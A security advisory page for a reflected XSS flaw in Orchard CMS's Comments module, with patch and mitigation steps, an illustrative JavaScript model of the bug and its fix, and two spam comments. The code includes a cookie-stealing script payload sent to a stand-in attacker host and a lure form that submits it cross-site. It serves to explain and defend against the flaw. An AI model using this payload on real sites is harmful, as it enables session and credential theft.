Orchard Security Update

Background

On April 30, 2013 we released a security update for a non-persistent (reflected) XSS vulnerability affecting all versions of Orchard. For more information on this kind of vulnerability please read http://en.wikipedia.org/wiki/Cross-site_scripting.

For the official announcement please read http://docs.orchardproject.net/Documentation/Patch-4-30-2013

Issue

The Comments module shipped with Orchard by default could, in some circumstances, let an external website get custom script rendered on an Orchard website. Because the attack is triggered from the external site, the usual advice applies: never click buttons or follow links on untrusted websites. Script injected this way could ultimately be used to capture your credentials if you then authenticate on the targeted Orchard website.

Action required

Apply the patch provided for your version in the Downloads section of the http://orchard.codeplex.com website, or update to Orchard 1.6.1.

Mitigation

  • If you don't use the Comments module in Orchard, you can simply disable it in the Modules section of the Dashboard.
  • If your theme doesn't render the Messages zone, you are also safe, even if the Comments module is activated, since the injected content has nowhere to be rendered.
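To make the issue and the mitigation concrete, here is an added illustration of a reflected XSS through a comment form whose notification echoes submitted input into a Messages-style zone, with the vulnerable rendering beside a hardened one. This is not Orchard's code and not the contents of the patch: the handler, field names, endpoint URL (https://victim.example/Comments/Create), hostnames and notification text are all assumptions chosen to mirror the advisory's description (an untrusted site submits a form to the target, and the result is rendered in the Messages zone).

```javascript
// Assumed, simplified model of a comment endpoint and a Messages zone.
// Not Orchard's code; names and messages are invented for illustration.

// HTML-encode the characters that matter in element content and attributes.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical comment handler: a rejected comment produces a notification
// that reflects the submitted Name field back to the user.
function handleComment(form) {
  if (!form.CommentText || form.CommentText.trim() === "") {
    return { ok: false, message: `Comment by ${form.Name} was not saved: text is required` };
  }
  return { ok: true, message: `Comment by ${form.Name} was saved` };
}

// Vulnerable zone rendering: notifications are concatenated into the page raw.
function renderMessagesZoneVulnerable(messages) {
  return '<div class="zone-messages">' +
    messages.map((m) => `<div class="message">${m}</div>`).join("") +
    "</div>";
}

// Hardened zone rendering: every notification is HTML-encoded on output,
// so reflected input is shown as text instead of being parsed as markup.
function renderMessagesZoneSafe(messages) {
  return '<div class="zone-messages">' +
    messages.map((m) => `<div class="message">${htmlEncode(m)}</div>`).join("") +
    "</div>";
}

// Constructed attacker payload: exfiltrates the victim's cookies.
function attackerPayload() {
  return '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
}

// The untrusted page's form, cross-site POSTing to the target's comment
// endpoint. Clicking its button is the "click on buttons from untrusted
// websites" step; an empty CommentText forces the reflecting error path.
// The attribute value is encoded so the browser submits the exact payload.
function attackerPage() {
  return [
    '<form method="post" action="https://victim.example/Comments/Create">',
    `  <input type="hidden" name="Name" value="${htmlEncode(attackerPayload())}">`,
    '  <input type="hidden" name="CommentText" value="">',
    "  <button>Claim your prize</button>",
    "</form>",
  ].join("\n");
}

// Simulate the submission landing on the target and the zone being rendered.
function simulateSubmission(renderZone) {
  const form = { Name: attackerPayload(), CommentText: "" };
  const result = handleComment(form);
  return renderZone([result.message]);
}

// Does the rendered HTML contain a live <script> element?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Zone not rendered by the theme (second mitigation): nothing reaches the page.
function renderNoMessagesZone() {
  return "";
}

console.log("vulnerable:", containsLiveScript(simulateSubmission(renderMessagesZoneVulnerable)));
console.log("encoded:   ", containsLiveScript(simulateSubmission(renderMessagesZoneSafe)));
console.log("no zone:   ", containsLiveScript(simulateSubmission(renderNoMessagesZone)));
```

Running the block prints `true` for the vulnerable zone and `false` for the other two, which is the whole story of the advisory's two mitigations: either the reflected notification is never rendered (no Messages zone in the theme, or no Comments module producing it), or it is rendered only after encoding. Output encoding at the rendering step is the standard remedy for this class of bug; the page does not describe the internals of the official patch, so treat the hardened function as a generic fix rather than a description of it.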

2 Comments

  • top essay writing service said:

    I visit this blog for the first time and am motivated by this well done work. I am really impressed with this blog. It is easy to see that you are passionate about your writing. If only I had your writing ability. I look forward to more updates. Extraordinary post, keep up posting such incredible data. Great tips. Thanks for the ideas.

  • icloud unlock experts said:

    I am so interested in this because a friend recommended this to me.
